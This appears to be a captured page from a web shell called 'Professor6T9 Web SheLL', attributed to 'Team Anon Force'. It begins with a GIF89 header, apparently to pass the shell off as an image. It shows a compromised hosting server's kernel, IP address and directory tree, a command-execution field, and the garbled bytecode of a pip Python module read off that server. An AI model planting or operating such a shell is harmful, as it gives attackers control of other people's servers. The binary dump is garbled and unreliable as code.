GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux premium133.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
162.0.232.69
/
opt
/
imunify360
/
venv
/
lib
/
python3.11
/
site-packages
/
pip
/
_internal
/
utils
/
__pycache__
[ HOME ]
Exec
Submit
filesystem.cpython-311.pyc
� L�i� � �T � d dl mZ d dlZd dlZd dlZd dlZd dlZd dlmZ d dl m Z d dlmZ d dl mZ d dlmZmZmZmZ d dlmZ d d lmZ d d lmZ d,d�Ze d-d�� � Z edd�� � ej � � Zd,d�Zd,d�Zd.d�Zd/d�Z d0d�Z!d/d�Z"d0d �Z#d1d%�Z$d2d)�Z%d3d*�Z&d3d+�Z'dS )4� )�annotationsN)� Generator)�contextmanager)�Path)�NamedTemporaryFile)�Any�BinaryIO�Callable�cast)�get_path_uid)�format_size)�retry�path�str�return�boolc �� � t j dk st t d� � sdS t j � | � � sJ �d }| |k r�t j � | � � r^t j � � dk r( t | � � }n# t $ r Y dS w xY w|dk S t j | t j � � S | t j � | � � } }| |k ��dS )N�win32�geteuidTr F) �sys�platform�hasattr�osr �isabs�lexistsr r �OSError�access�W_OK�dirname)r �previous�path_uids �~/builddir/build/BUILD/imunify360-venv-2.6.1/opt/imunify360/venv/lib/python3.11/site-packages/pip/_internal/utils/filesystem.py�check_path_ownerr# s� � � �|�w���g�b�)�&<�&<���t� �7�=�=��������H� �(� � � �7�?�?�4� � � 9��z�|�|�q� � �!�+�D�1�1�H�H��� !� !� !� �5�5�!�����1�}�$��y��r�w�/�/�/�!�2�7�?�?�4�#8�#8�d�H� �(� � � �5s �B � B&�%B&�kwargsr �Generator[BinaryIO, None, None]c + � K � t ddt j � | � � t j � | � � dd�|��5 }t t |� � } |V � |� � � t j |� � � � � n?# |� � � t j |� � � � � w xY w ddd� � dS # 1 swxY w Y dS )a% Return a file-like object pointing to a tmp file next to path. The file is created securely and is ensured to be written to disk after the context reaches its end. kwargs will be passed to tempfile.NamedTemporaryFile to control the way the temporary file will be opened. Fz.tmp)�delete�dir�prefix�suffixN� ) r r r r �basenamer r �flush�fsync�fileno)r r$ �f�results r"